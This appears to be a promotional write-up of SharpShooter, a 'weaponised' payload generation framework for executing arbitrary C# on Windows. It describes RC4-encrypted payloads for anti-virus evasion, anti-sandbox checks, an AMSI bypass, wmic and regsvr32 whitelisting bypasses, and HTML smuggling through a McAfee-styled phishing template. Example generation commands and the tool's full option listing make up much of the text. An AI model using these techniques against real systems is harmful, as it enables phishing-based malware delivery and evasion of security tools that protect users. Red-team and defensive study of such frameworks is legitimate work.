Payload Generation Framework – SharpShooter

Payload Generation Framework – SharpShooter


Increased use of PowerShell attacks led to the fact that they are much better logged and detected today. Yes, PowerShell is flexible, but we needed urgent alternatives. Everyone started to turn to C# and the .NET utilities to execute code on Windows. That’s how SharpShooter, payload generation framework, came out.

SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring.

Payload Generation Framework: SharpShooter

SharpShooter is a payload generation framework for the retrieval and execution of arbitrary CSharp source code. This penetration framework leverages James Forshaw’s DotNetToJavaScript tool and supports the ability to create payloads in a wide variety of formats, such as:

  • HTA, JS, VBS, JSE, VBA, VBE and WSF.
Those payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection. SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.


  • Sandbox Detection : several default techniques to evade detection, including identifying tools
  • Stageless Execution : with ability to inject an in-memory shellcode directly into the process, this framework supports full fileless mode
  • XSL Exploitation : (Squiblytwo) bypasses signatures and security solutions by executing XSL (eXtensible Stylesheet Language) full trust scripts from the WMIC command line
  • Squiblydoo and Squiblytwo support: COM Staging and XSL Exploitation directly through COM
  • AMSI Bypass : uses XPath expression on the XSL file to bypass Windows Defender AMSI signature

Sandbox Detection

Since SharpShooter has several default techniques to evade detection, including identifying tools, you can choose some or all of them. The payload will not execute if the conditions of the selected sandbox detection techniques are met.

  • Key to Domain: the payload will only execute on a specific domain;
  • Ensure Domain Joined: will only execute if the workstation is domain joined;
  • Check for Sandbox Artifacts: search the file system for artifacts of known sandbox technologies and virtualisation systems, if found the payload will not execute;
  • Check for Bad MACs: check the MAC address of the system, if the vendor matches known virtualisation software it will not execute;
  • Check for Debugging: if the payload is being debugged, it will not execute.

Stageless Execution

SharpShooter supports both staged and stageless payload execution. With ability to inject an in-memory shellcode directly into the process, this framework supports full fileless mode.

  • MacAfee HTML template if user clicks phishing link, it will open JavaScript file, and the shellcode will be executed.Payload Generation Framework – SharpShooter Mcafee template
It contains a base64 encoded, rc4 encrypted blob which is decrypted in-memory, on execution. The decrypted payload is the DotNetToJScript code that contains the SharpShooter .NET serialised object.

Squiblydoo and Squiblytwo

Sharpshooter supports Squiblydoo and SquiblyTwo attacks.

  • One-liners using a COM interface (COM Staging):
    Sharpshooter would now create either a XSL or SCT hosted payload, and the script based payload would be a COM stager in either HTA, VBS, JS, WSF or similar formats, to execute either wmic.exe or regsvr32.exe

    Payload Generation Framework – SharpShooter COMStaging

    The following command will generate this with SharpShooter:

    python --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook -awl wmic --awlurl
  • XSL Exploitation directly through COM
    The benefit of this technique is that you’re able to somewhat avoid some of the indicators associated with the wmic.exe and regsvr32.exe techniques, in particular there is no risk of being detected through command-line logging.

    Payload Generation Framework – SharpShooter xslcom

    This technique can be used by running:

    python --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x64payload.bin --smuggle --template mcafee --com xslremote --awlurl


Clone it from the github:

git clone


To see available options, methods and techniques, just type --help:

usage: [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                       [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                       [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                       [--rawscfile <path>] [--shellcode] [--scfile <path>]
                       [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                       [--web <web>] [--dns <dns>] [--output <output>]
                       [--smuggle] [--template <tpl>]

optional arguments:
  -h, --help          show this help message and exit
  --stageless         Create a stageless payload
  --dotnetver <ver>   Target .NET Version: 2 or 4
  --com <com>         COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>         Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>   URL to retrieve XSL/SCT payload
  --payload <format>  Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>   Anti-sandbox techniques:
                      [1] Key to Domain (e.g. 1=CONTOSO)
                      [2] Ensure Domain Joined
                      [3] Check for Sandbox Artifacts
                      [4] Check for Bad MACs
                      [5] Check for Debugging
  --amsi <amsi>       Use amsi bypass technique: amsienable
  --delivery <type>   Delivery method: web, dns, both
  --rawscfile <path>  Path to raw shellcode file for stageless payloads
  --shellcode         Use built in shellcode execution
  --scfile <path>     Path to shellcode file as CSharp byte array
  --refs <refs>       References required to compile custom CSharp,
                      e.g. mscorlib.dll,System.Windows.Forms.dll
  --namespace <ns>    Namespace for custom CSharp,
  --entrypoint <ep>   Method to execute,
                      e.g. Main
  --web <web>         URI for web delivery
  --dns <dns>         Domain for DNS delivery
  --output <output>   Name of output file (e.g. maldoc)
  --smuggle           Smuggle file inside HTML
  --template <tpl>    Name of template file (e.g. mcafee)
Documentation Box
Download Box